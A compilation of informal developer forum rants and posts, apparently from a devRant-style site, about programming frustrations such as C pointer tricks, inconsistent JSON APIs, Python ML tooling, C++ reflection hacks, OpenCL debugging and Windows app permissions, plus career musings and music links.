
6f0097d I'm too old for this shit!

133179e I'm just a grunt. Don't blame me for this awful PoS.

d3e5202 harharhar

57d9a7c THE MEM TEST FUNCTION YOU ARE LOOKING FOR, IS HERE. SAY THANKS FOR THIS COMMIT MESSAGE -

Overhauling a C++ project into C#. There is a lot of IntPtr logic being thrown around. In related news, I have the song "Do you believe in magic?" stuck in my head.1

-

When it comes to the idea of programming and magic, or the comparison of software developers/engineers, computer scientists etc to magicians or wizards, nothing brings the idea closer to home than the C programming language.

A while ago I read the R.A. Salvatore books concerning Drizzt, the dark elf. I loved the books, have not continued reading them but I remember them vividly. There was one book in which a human magician came about wielding extremely explosive magic; humans were capable of channeling large amounts of it through explosive and unwieldy ends.

This is the same feeling I get from C

Consider:

int items[] = {1, 2, 3};

printf("Third : %i\n", 2[items]);

and fuck me if shit like the above is not dangerous. It makes sense: an array decays to a pointer to its first element and a[i] is just *(a + i), so 2[items] is *(2 + items) and returns the third element of the array of 3. But holy shit if I don't think this is dangerous and interesting as fuck

there are many more examples I have that I am finding through me fucking around with: language development (compiler, interpreter), kernel programming as well as net sec. C is the most powerful and devastating thing we have in our hands indeed.7 -
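The index-swapping trick above can be sketched roughly like this (written as C++, where built-in arrays behave the same way as in C). The helper names `subscript_forms_agree` and `third_of_three` are made up for illustration, not anything from the rant:

```cpp
#include <cstddef>

// a[i] is defined as *(a + i); pointer addition commutes, so i[a] names
// the same element. Hypothetical helper: true when all three spellings agree.
inline bool subscript_forms_agree(const int* a, std::size_t i) {
    return a[i] == *(a + i) && a[i] == i[a];
}

// Returns the third element of a 3-element array using the reversed spelling.
inline int third_of_three() {
    int items[] = {1, 2, 3};
    return 2[items];  // same as items[2]; 3[items] would read past the end
}
```

The dangerous part is that nothing checks the index: any integer compiles, in either spelling.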

Working on an Android app for a client who has a dev team that is developing a web app with Ember.js / Rails. These folks are "in charge" of the endpoints our app needs to function. Now as a native developer, I'm not a hater of a web app's way of doing things, but with this particular app their dev team seems to think that all programming languages can parse json as dynamically as javascript...

Exhibit A:

- Sample Endpoint Documentation

* GetImportantInfo

* Params: $id // id of info to get details of

* Endpoint: get-info/$id

* Method: GET

* Entity Return {SampleInfoModel}

- Example API calls in desktop REST client

* get-info/1

- response

{

"a" : 0,

"b" : false,

"c" : null

}

* get-info/2

- response

{

"a" : [null, "random date stamp"],

"b" : 3.14,

"c" : {

"z" : false,

"y" : 0.5

}

}

* get-info/3

- response

{

"a" : "false", // yes, as a string

"b" : "yellow",

"c" : 1.75

}

Look, I get that js and ruby have dynamic types and a string can become a float can become a Boolean can become a cat can become an anvil. But that mess is very difficult to parse and make sense of in a stack that relies on static types.

After writing a million switch statements with cases like "is Float" or "is String" on kotlin's Any type // maps to java.lang.Object, I throw my hands in the air and tell my boss we need to get on the phone with these folks. He agrees and we schedule a day that their main developer can come to our shop to "show us the ropes".
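For a rough idea of what that type-switching looks like in a statically typed client, here is a minimal C++17 sketch. `DynamicField` and `describe` are hypothetical names, and the arrays and nested objects from the sample responses are left out to keep it short:

```cpp
#include <string>
#include <type_traits>
#include <variant>

// Hypothetical model of one field whose JSON type changes between responses:
// null, boolean, number or string.
using DynamicField = std::variant<std::monostate, bool, double, std::string>;

// Every consumer of the field has to branch on the type actually received.
inline std::string describe(const DynamicField& field) {
    return std::visit([](const auto& value) -> std::string {
        using T = std::decay_t<decltype(value)>;
        if constexpr (std::is_same_v<T, std::monostate>) {
            return "null";
        } else if constexpr (std::is_same_v<T, bool>) {
            return value ? "bool:true" : "bool:false";
        } else if constexpr (std::is_same_v<T, double>) {
            return "number";
        } else {
            return "string:" + value;  // e.g. the string "false" from get-info/3
        }
    }, field);
}
```

Note that the boolean false and the string "false" land in different branches, which is exactly the kind of case the client code has to keep apart by hand.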

So the day comes and this guy shows up with his mac book pro and skinny jeans. We begin showing him the different data types coming back and explain how it's bad for performance and can lead to bugs in the future if the model structure changes between different call params. He matter-of-factly has an epiphany and exclaims "OHHHHHH! I got you covered dawg!" and begins click clacking on his laptop to make sense of it all. We decide not to disturb him any more so he can keep working.

3 hours go by...

He bursts out of our conference room shouting "I am the greatest coder in the world! There's no problem I can't solve! Test it now!"

Weary, we begin testing the endpoints in our REST clients....

His magic fix, every single response is a quoted string of json:

example:

- old response

{

"foo" : "bar"

}

- new "improved" response

"{ \"foo\" : \"bar\" }"

smh....8 -

I might create a coding course for people actually interested in learning how to program correctly (not Get Rich Quick Bootcamp style, not webapps, not magic Javascript incantations).

I have an idea on how to structure it but I worry it'll be too weird for most people to follow (starting from binary theory and then teaching machine code and then working upwards to C and beyond) explaining how a computer works along the way, showing the real errors with annotations explaining things, etc.

I've always wanted to teach in this format but I feel as though it's too.. idk, "useless" to most people? But I've never had a friend go through e.g. Codecademy and come out knowing how to actually make applications from start to finish without just hacking together random React components and hoping the frankenstein project works well enough.

The target demographic would be those either completely new to programming or just have a fundamental or web-centric preexisting knowledge, or maybe those who simply want to understand computers better.

Am I barking up a shitty tree?28 -

python machine learning tutorials:

- import preprocessed dataset in perfect format specially crafted to match the model instead of reading from file like it would work in actual real life

- use images data for recurrent neural network and see no problem

- use Conv1D for 2d input data like images

- use two letter variable names that only tutorial creator knows what they mean.

- do 10 data transformation in 1 line with no explanation of what is going on

- just enter these magic words

- okey guys thanks for watching make sure to hit that subscribe button

ehh, the machine learning ecosystem is burning pile of shit let me give you some examples:

- thanks to years of object oriented programming research and most wonderful abstractions we have "loss.backward()" which has no apparent connection to the model but it affects the model, good to know

- cannot install the python packages because python must be >= 3.9 and at the same time < 3.9

- runtime error with bullshit cryptic message

- python having no data types but pytorch forces you to specify float32

- lets throw away the module name of a function with these simple tricks:

"import torch.nn.functional as F"

"import torch_geometric.transforms as T"

- tensor.detach().cpu().numpy() ???

- class NeuralNetwork(torch.nn.Module):

      def __init__(self):

          super(NeuralNetwork, self).__init__() ????

- lets call a function that switches layers like dropout and batch norm into training mode "model.train()" instead of something more indicative of the function's actual effect like "model.set_mode_to_train()"

- what the fuck is ".iloc" ?

- solving environment -/- brings back memories when you could make a breakfast while the computer was turning on

- hey lets choose the slowest, most sloppy and inconsistent language ever created for high performance computing task called "data sCieNcE". but.. but. you can use numpy! I DONT GIVE A SHIT about numpy why don't you motherfuckers create a language that is inherently performant instead of calling some convoluted c++ library that requires 10s of dependencies? Why don't you create a package management system that works without me having to try random bullshit for 3 hours???

- lets set as industry standard a jupyter notebook which is not git compatible and have either 2 second latency of tab completion, no tab completion, no documentation on hover or useless documentation on hover, no way to easily redo the changes, no autosave, no error highlighting and possibility to use variable defined in a cell below in the cell above it

- lets use inconsistent variable names like "read_csv" and "isfile"

- lets pass a boolean variable as a string "true"

- lets contribute to tech enabled authoritarianism and create a face recognition and object detection models that china uses to destroy uyghur minority

- lets create a license plate computer vision system that will help the government surveil everyone, guys what a great idea

I don't want to deal with this bullshit language, bullshit ecosystem and bullshit unethical tech anymore.12 -

That time when I wowed all my colleagues with C++-code that executed over 2.5x faster than theirs, without changing one line of code.

I guess they didn't know what -O2 does (or that it exists, for that matter).7 -

Recently bought an Adafruit Industries board which controls stepper motors over I2C. It has a Python library, but my code is in C++. Decided to convert the Python code to C++ to get started quickly. Behold the magic line that made everything work:

std::this_thread::sleep_for(std::chrono::milliseconds(10));

I can't believe Python's ridiculously slow performance is being harnessed to give the field generated by the electromagnets in a stepper motor time to grow enough to effect movement. Without said sleep(), the stepper motor just vibrates with my C++ code. Not sure if the library was created with Python's performance in mind, or they simply didn't think about back EMF in electromagnets...5 -
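A minimal sketch of where that line would sit in a stepping loop, assuming a 4-phase full-step sequence. `run_steps` and `write_coils` are hypothetical stand-ins, not the Adafruit library's API, and the right delay depends on the motor and driver:

```cpp
#include <chrono>
#include <functional>
#include <thread>

// Hypothetical driver loop: write one coil pattern per step, then wait so the
// motor has time to move before the next pattern is written.
// `write_coils` stands in for whatever I2C write the real board needs.
inline int run_steps(int steps,
                     std::chrono::milliseconds settle,
                     const std::function<void(int)>& write_coils) {
    int written = 0;
    for (int i = 0; i < steps; ++i) {
        write_coils(i % 4);                   // index into the 4-phase sequence
        std::this_thread::sleep_for(settle);  // the delay the interpreter gave for free
        ++written;
    }
    return written;
}
```

Calling it with `std::chrono::milliseconds(10)` reproduces the delay from the rant; whatever the physical cause, making the pause explicit keeps the timing from depending on how slow the host language happens to be.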

I think the worst time was when I worked on a work project through the night. It was at my previous employer, I was forced to work on legacy php projects I knew nothing about. Nobody could help me and I was always doing days over tickets which were just a pain in the ass in an old magic framework and a custom build cms :c.

I couldn't motivate myself for days and eventually when the deadline came I worked through the night and committed in the morning, then I jumped into bed. I realized that this was a big sign that I really had to quit, and switched companies several months later.2 -

hmmmmmm let me see.

Web based? lets do web based.

Do something simple like a basic crud app on web api format:

Do it with full authorization and authentication.

Start hard. Do it with pure golang using NOTHING but the std libraries.

Now, do it in a magic mvc framework like Rails or Laravel

Now do it on dotnet core

Now do it in django rest.

Watch the differences in all of them, sell your soul to something and now do it in Clojure. If you do it on a Scheme dialect or on Common Lisp my CMS admin will suck your whatever you have. Dude seems to be pretty good at it, we are trying to keep him from pulling tricks on the street but he insists.

Then add a React client with Typescript to get them basic ass endpoints to display nicely.

It should give you a fuckload of perspective amongst the different tools and way we do things and might make you appreciate the differences in paradigms required(pro points for doing modular in c# dotnetcore using different classlibs for the major points of the application using some crazy pattern like the mediator pattern)

I would hire a mfker that throws all this shit at me on a portfolio on the spot.10 -

I learned to code by trying to automate things. I started out with Windows batch and moved up to Java before I discovered the magic of C, C++, Python, and now Swift1

-

"Reflective" programming...

In almost every other language:

1. obj.GetType().GetProperties()

or

for k, v in pairs(obj) do something end

or

fieldnames(typeof(obj))

or

Object.entries(obj)

2. Enjoy.

In C++: 💀

1. Use the extern keyword to trick compilers into believing some fake objects of your chosen type actually exist.

2. Use the famous C++ type loophole or structured binding to extract fields from your fake objects.

3. Figure out a way to suppress those annoying compiler warnings that were generated because of how much of a bad practice your code is.

4. Extract type and field names from strings generated by compiler magic (__PRETTY_FUNCTION__, __FUNCSIG__) or from the extremely new feature std::source_location (people hate you because their Windows XP compilers can't handle your code)

5. Realize your code still does not work for classes that have private or protected fields.

6. Decide it's time to become a language lawyer and make OOPers angry by breaking encapsulation and stealing private fields from their classes using explicit template instantiation

7. Realize your code will never work outside of MSVC, GCC or Clang and will always be reliant on undefined behavior.

8. Live forever in doubt and fear that new changes to the compiler magic you abused will one day break your code.

9. SUFFER IN HELL as you start getting 5000 lines worth of template errors after switching to a new compiler.13 -
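Step 4 can be sketched roughly as follows for a type name, assuming GCC or Clang, which both embed "T = <type>" in `__PRETTY_FUNCTION__`. MSVC would need `__FUNCSIG__` and different parsing, which is not shown. `type_name` and `Point` are hypothetical names, and the exact strings are compiler-specific rather than guaranteed by the standard:

```cpp
#include <string_view>

// Sketch for GCC and Clang only: pull the type name out of the compiler's
// pretty-printed function signature.
template <typename T>
std::string_view type_name() {
    const std::string_view sig = __PRETTY_FUNCTION__;
    const auto marker = sig.find("T = ");
    if (marker == std::string_view::npos) {
        return {};  // unexpected signature format
    }
    const auto start = marker + 4;                    // skip past "T = "
    const auto end = sig.find_first_of(";]", start);  // GCC stops at ';', Clang at ']'
    return sig.substr(start, end - start);
}

struct Point { int x; int y; };  // hypothetical type to try it on
```

With those compilers, `type_name<Point>()` is expected to yield `Point`, but that relies entirely on the undocumented layout of the signature string, which is the fear described in step 8.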

So I have to make new screens in XAML in combination with C# (WPF)

So I had something like this in the codebehind

titleBox.Text = Properties.Resources.someKey

The resources file looks like

<data name="someKey">

<value>some text</value> <!-- this is some comment --> <!-- and another one -->

</data>

The title got as value "and another one", when I removed it it became "this is some comment" removing that resulted in the value "some text"1 -

I give software support to Rugged handhelds in a company and everyday some IT support moron comes to me with a crazy request. The day just started and...

IT Tech: "Hello, C, can you improve the touchscreen sensitivity? It's not so responsive and sometimes we have to click more than once for something to work"

**breath in**

Me: "That's ok, the rugged ones that you have are very old, besides they have resistive screens, so your fingers won't do a good job"

IT Tech: "THERE'S NO WAY TO FIX IT? I guess I'll open a ticket for you to study more calmly about the issue"

**NGGGGGGGGGHHHH**

Me: "If it's not a software thing, I can't do that, I don't have hardware skills, I guess you'll have to call our provider about that, but, before you do something, try to recalibrate your handhelds, the majority of the users don't do that at the system's start and the touch experience really can become a mess"

IT Tech: "Hmmm, I'll try that, otherwise I'll get back to you, thanks!"

OMFGGGGG

I am open to suggestions of a magic batch file/ .NET CF 2.0 software that will turn their handhelds into a Galaxy S6 touch experience. THANKS!1 -

Today I had to spend the whole day fixing a stupid bug in a legacy application in a completely different tech stack than I'm used to...

At my company we have an Internet application running where we can upload a word document and using some mailmerge variables magic, can set those vars and receive the personalised word doc back...

Now this is great, when it's working, and is used in various projects we have up and running... Suddenly the application decides to crap out for no apparent reason and guess who drew the short straw....

Anyhow I ask our sys admin for the password to the server, I remote desktop to it, turns out its a fucking Windows 2008 server...

But wait, it gets better: the application, a shoddy mess of C# code, is not under any sort of version control, has to be developed on that same server and, to top it all off, I have to follow some obscure, barely documented deployment procedure to get my changes live....

So after a lot of cursing on the dev (not working at the company any more) who did the original setup, and hours of painstakingly piecing together how it works and what went wrong and how to fix it, I finally managed to get it working....

After this rant, I'm mailing my technical lead about this in the hopes we can get someone to do it right (yes, I'm that naive)1 -

Let me start this off by stating I'm a Java dev, and a noob with C++.

Thought it'd be cool to learn some OpenCL, since I want to do some maths stuff and why not learn something new.

So I sat down, installed Nvidia proprietary drivers, broke my x-org server, purged, reinstalled, rebooted and after a while I got stuff sorted out.

Then on to my IDE. I use CLion and it uses Cmake. C++ noob knows shit about Cmake, so struggle for two hours trying to figure out wtf is going on with the OpenCL libs and why they're only partially detected. Fml.

Finally, everything is configured and I'm set. I start working on a Hello World program using OpenCL. Finish it in 20 mins, all good. No output. Do some googling, check my program a million times. Nothing wrong here. Check the kernel, everything as in the tutorial.

I start checking error codes after a while reported by OpenCL (which I had no clue was a thing) and I get some code saying the program was not created properly (to run the kernel). No fucking clue what's up with that. Google around, find another tutorial, rewrite my code in case I'm using outdated code or something. Nothing.

Fast forward an hour, I find out that OpenCL has logs! So I grab some code from the website I found it on, and voila, I finally get some info on what's going on.

Get a load of this bs.

In the kernel file, so that OpenCL knows that it's a function to run, you have to put __kernel. But in all the places I read, it said to put it as _kernel.

Add the underscore, compile, run and everything is perfect.

Then I tried just putting 'kernel'. Also compiles and runs fine.

Two hours and my program was fixed by adding an underscore. IF ONLY C++ GAVE AN INDICATION OF WHAT BLEW UP INSTEAD OF SITTING BACK AND BEING LIKE "oh wow man feels bad, work some magic and try again" THEN THIS WOULD NOT HAVE TAKEN SO LONG.

Then again, it was OpenCL that was being shitty with its styling enforcement or whatever the hell the underscore business is. But screw it. C++ eats shit too for this. Sure, maybe Java babies you by giving you the exact error and position that the error took place at. But at least that way you don't waste hours of your life chasing invisible bugs 😠😠

I'm going to eat some food... Too much energy was consumed fighting the system... Then I'll get back to OpenCL because 😇 but that doesn't make it less bs.1 -

So as a student developer with years of background in web development (including both front and backend), c++, java and c#, I was more than surprised when I found out my Informatics assignment hadnt received the proper excellent mark. In fact both me and a friend of mine who has been working with C++ in particular for years got a --mark.

// The assignment was the most simple Windows Forms Application with 2 buttons and a textbox

When we asked about that the teacher said we hadn't labeled the buttons and textboxes, though we had actually taken our time to put labels next to each UI element that would need usage directions.

Though what she meant was renaming the actual variable names, those being textBox1, button1 and button2.

We of course got really mad, because we both follow the accepted naming conventions for each of the languages we write in. Arguing was to no avail. Even telling her that variable naming was not in the assignment instructions was pointless as she said it had been self explanatory..

The others for whom computers are powered by magic, did their assignments as they had memorized everything that teacher had shown them. Why? Because she didn't teach them how to code in the first place. So they copied what would work.

Fucked up educational system, sadly nothing new..

Oh and btw, the naming she uses and teaches students to use is:

button1 - btname

label1- lbname

textBox1 - tbyear2 -

I. Hate. Windows. Apps. UGH.

I may never be able to play FS2020 from the Xbox Game Pass again as... Its unable to install, gives a helpful 0x1 error code, and the help page link goes to a 404.

Now, I caused this myself... Partially... Er, no, fully, but I had a good reason!

I wanted to install something larger again and didn't have enough disk space. Fired up WinDirStat and there was a huge, like... 45 GB file in C:\Program Files\WindowsApps\Somedir\

Googling around, I found some people saying its a temp file so that Windows Store could reserve enough space for the app instalation... Okay, so... It got stuck, and I had no way to remove it?

Of course I didn't want to remove all apps of the windows market... So, I did something any *sane* person would never do - Took ownership of the whole WindowsApps and gave myself full control. Then I removed the file and... FS2020 never launched again.

I couldn't even uninstall it! It would give me no error either. It just lagged and then did nothing.

I tried resetting all the ACLs, tried giving ownership back to TrustedInstaller, nothing worked. Failed on some of the files, wtf?

Launching the game only ever told me there was an update in progress.

Tried booting a windows iso image and fix the ACLs from there, nope, also failed for the same bunch of files of FS2020. (Permission Denied while on a live image? Wow)

Last resort, I booted up Linux and tried removing the offending folders from there, only to find out that... Huh. The NTFS module labelled the offending folders as... broken links leading to an "unsupported reparse point". But hey, it let me remove it at least.

Since then, it no longer appeared as installed, but... Now, anytime I want to install it, it just throws an error 0x00000001 with no further details.

So yeah, I know I caused this myself, but after fiddling with the permissions and ACLs and NTFS dark magic, I feel justified in saying - Fuck you WindowsApps DRM.8 -

It started when I was about 10 years old.

My uncle showed me how to display something in the DOS prompt using the echo command in a custom batch file.

A few commands later, I was able to "program" a flip-book of an ASCII skier. Each ASCII picture was separated by pressing any key and cls ^^

Aaaaah. Sweet childhood memories!

Later on i used a programming-language for beginners in windows.

This language gave you control of a triangle called "turtle".

My first high-level programming language was Delphi.

Since I had no idea about databases, I created a pseudo database of Magic: The Gathering playing cards. Each card had its very own Windows form, filled up completely with an uncompressed image object displaying the chosen card modally. *sigh*

I scanned each card by using a feed scanner.

Finally, my application consisted of 200 cardimages and forced my PC to swap the required memory from my harddisk.

Boy o boy. I was such a noob! ^^

Over the years I discovered and fell in love with a lot of languages (JSP, Java(Script), C#, PHP, ...) and concepts (MVVM, MVC, clean architecture, TDD, ...)! ;) -

I know that DI(dependency injection) is probably just another good pattern out there like many others, but dear lord have I been burned on it with acumatica. Acumatica just loves having friggen magic crap everywhere with no damn explanation(*may be in a blog post somewhere but that’s no replacement for good documentation).

I believe they use Autofac in C# on an ASP.NET server. They love to use reflection and injection, and in turn the server takes multiple minutes to start up while it dynamically registers everything, and the same goes for any individual page.
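For anyone who hasn't run into this pattern, here is a rough sketch of what "register everything by reflection, then inject by type" looks like. This is a toy in Python, not Autofac's or Acumatica's actual API; `Container`, `Database` and `InvoiceService` are made-up names for illustration only. The scan in `register_all` is the part that gets slow when a real system walks thousands of types at startup.

```python
import inspect


class Container:
    """Toy DI container (hypothetical, not a real library's API)."""

    def __init__(self):
        self._registered = set()

    def register(self, cls):
        self._registered.add(cls)

    def register_all(self, namespace):
        # Reflection step: scan a name -> object mapping and register every class in it.
        for obj in namespace.values():
            if inspect.isclass(obj):
                self.register(obj)

    def resolve(self, cls):
        if cls not in self._registered:
            raise KeyError(f"{cls.__name__} is not registered")
        # Inspect the constructor and build each annotated dependency recursively.
        params = inspect.signature(cls.__init__).parameters
        kwargs = {
            name: self.resolve(param.annotation)
            for name, param in params.items()
            if name != "self" and param.annotation is not inspect.Parameter.empty
        }
        return cls(**kwargs)


# Hypothetical services, only here to exercise the container.
class Database:
    def query(self):
        return "rows"


class InvoiceService:
    def __init__(self, db: Database):
        self.db = db


container = Container()
container.register_all({"Database": Database, "InvoiceService": InvoiceService})
service = container.resolve(InvoiceService)
print(service.db.query())
```

Nothing in `InvoiceService` says where its `Database` comes from, which is exactly the "magic" part: convenient when it works, opaque when it doesn't.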

Development is a pain in the ass on this damn system.

I’m constantly having to dive into the damn code using dotPeek to understand what the fuck they are doing, and it’s often friggen stupid shit. They like to reinvent the wheel a fair bit. -

Sometimes my hatred for code is so.. overwhelming that I think I need a sabbatical or should even stop altogether.

Let's face it. All code sucks. Just on different levels.

Want to go all bare metal? Love low-level bit fiddling? Well, have fun hunting for concurrency and memory corruption bugs. Still feel confident? Get ulcers from a large C/C++ code base already in production, where something in the shared memory or function pointer magic is not totally right?

So you strive for cleaner abstractions, fancy the high-level stuff? Well, can you make sense of gcc's template error messages? Are you ready for the monad, leaving behind the mundane everyday programmers who still wonder about the scope of x and xs?

Wherever you go, isn't it a stinking shit pile of entropy and arbitrary human-made conventions? You're just getting more familiar with them, so you don't question them, they become your second skin, you become proficient - congrats, you're a member of the 1337. -

"Any sufficiently advanced technology is indistinguishable from magic." – Arthur C. Clarke

(especially to non-tech people) -

I'm doing a project for uni in OMNeT++ (a C++ framework that should facilitate working with networks of queues, simulating and displaying statistics).

I needed to retrieve a random value from an exponential distribution, and the function to do so requires a random number generator as input. The framework has 2 implementations of the RNG and I picked the first one.
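For context on why such a function wants an RNG at all: a common way to draw from an exponential distribution is inverse-transform sampling, which turns one uniform number into one exponential sample. The sketch below is generic Python, not the framework's code; `sample_exponential` and its parameters are names I made up, and it is not a diagnosis of the bug described here.

```python
import math
import random


def sample_exponential(mean, rng):
    """Draw one exponential sample via inverse-transform sampling.

    `rng` is assumed to be any callable returning a uniform float in [0, 1).
    """
    if mean <= 0:
        raise ValueError("mean must be positive")
    u = rng()
    # 1 - u lies in (0, 1], so log() never sees 0 and the result stays finite.
    return -mean * math.log(1.0 - u)


generator = random.Random(42)  # seeded so runs are repeatable
samples = [sample_exponential(2.0, generator.random) for _ in range(10_000)]
sample_mean = sum(samples) / len(samples)
print(sample_mean)  # should land close to the requested mean of 2.0
```

The sampler is only as good as the uniform values it is fed: a source that hands back values outside the expected range would produce garbage no matter how correct the formula is.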

I spent 3 hours trying every possible thing, using both the exponential() function and its class wrapper (both provided by the framework), and it always returned 0 or NaN.

The RNG was spitting out values correctly, so I thought it was okay.

When I was almost ready to give up, I figured I could try and change to the second implementation of RNG, expecting nothing to change. And it fucking worked.

Zero reports on this behavior on Google, no apparent reason why it would work with one and not with the other when the two RNGs literally implement the same abstract class and spit out the same exact numbers... Just black magic...

Oh and cherry on top, it works with the raw function but not with the class wrapper on that same function... IF YOU GOTTA IMPLEMENT SOMETHING IN YOUR DAMN FRAMEWORK THAT DOESN'T WORK, FUCKING DON'T! 1 combination working out of 4 is not good! Or at least document it!

Sorry, just had to share my pain -

Damn, lots of you knew this shit before coming of age.

I didn't code a single line until I went to college.

I tried to, but it was just too fucking complicated and I didn't understand a thing. Tried to grasp how to use some tools like Unity or an Adventure Maker of sorts and something called Flix for Flash games. Didn't understand shit.

I decided to study systems engineering because of a career aptitude test I took, hoping that way I could somehow learn something.

First thing I was taught was bash.

When I realised I already knew enough to code a whole text adventure from scratch with such a simple language I felt really hyped.

Always loved text and graphic adventures.

Afterwards I was taught the Z80 assembly language and how CPU registers worked and it blew my fucking mind.

That was the first half-year.

Then I was taught C. And boy was it hard. Didn't get how memory was being handled until the very end.

I happened to be one of the few passing a stupidly complicated semifinal test with triple indirection pointers.

That felt goood.

Learning other languages afterwards was a piece of cake. C#, Java, X86 assembly, C++...

It was a hard door to open. Fucking heavy. But now nothing seems black magic anymore and boy isn't that something to be proud of! :D -

Right guys and gals, I need your opinions.

I was recently approached by a recruiter who thought I’d be a good fit for a role, a role that is a step up from senior dev but without moving into people / project management.

More like a bridge between architects and senior devs.

I thought what the hell, why not. So I agreed to go for it.

It could be quite a decent payrise (though that wasn’t my motivation for going for it) and I like the idea of doing more mentoring, design and research than I do now. It would involve stuff like learning new tech, coming up with examples and implementations of how the dev team need to use it to churn out user stories.

For the last few years I’ve been mainly a back end developer, which didn’t start by choice and I always liked to be full stack.

But the recruitment process for this role has been quite slow (number of reasons) and since then I’ve been given a new piece of work at my current employer doing some greenfield angular work, plus the c# back end.

I’m really, really enjoying this angular work. Haven’t done it for a while and it feels great to get back into it. Seem to be picking it back up with no problems, like the old magic is still there.

Also the money at my current place is good enough.

So now I’m wondering if I should bail on this other role in favour of seeing this out and maybe going back to being full stack (tho for reasons I’ll outline below in the long term that might have to be elsewhere)

But I’m also trying to remind myself that up until enjoying this work there’s a reason I decided to go for this other role.

Current place is a small company that has no project management process. It’s chaos, and everything’s an emergency. There are no requirements for anything, not enough people etc. No one has a clue how to run an IT project.

The one thing we do have is good development practices in our team, and we have been greenfield for the last 12 months working on a new product. But we do tend to be pigeonholed into looking after a specific service/area.

But this new place if I got the role, is a bigger company (I’ve worked in small, medium and massive companies so I know what the difference is like), they’re a household name, they have resources for learning, putting people through aws certs, etc. They give people time each week to invest in themselves. Much more agile.

And thinking about it now you don’t often see a role that allows you to ‘move up’ without having to take on people/project management and still having time to be hands on.

(Just maybe more hands on with strategic work than delivering user stories for business as usual)

So just in general, what do you think? -

Here come a few inspirational (or depressing, depending on the POV) tracks:

Listen to Pegboard Nerds - Hero (feat. Elizaveta) [Infected Mushroom Remix] by InfectedMushroom on #SoundCloud

https://soundcloud.com/infectedmush...

Listen to Merkaba - Epic Life by Lipaz Saar on #SoundCloud

https://on.soundcloud.com/gano6

Listen to Balduin & Wolfgang Lohr feat. J Fitz - Magic Man by Wolfgang Lohr on #SoundCloud

https://soundcloud.com/wolfganglohr...

Listen to Patrick Haize & Momentology - Souls Recognition by Momentology on #SoundCloud

https://on.soundcloud.com/tmnxT

and another that's just cool:

Listen to Merkaba - Mental Monkey Bars by Sell .. on #SoundCloud

https://soundcloud.com/cassio-sell/...

enjoy (or not), either way enjoy the sunny day or moony night (if u have such @ ur loc) =]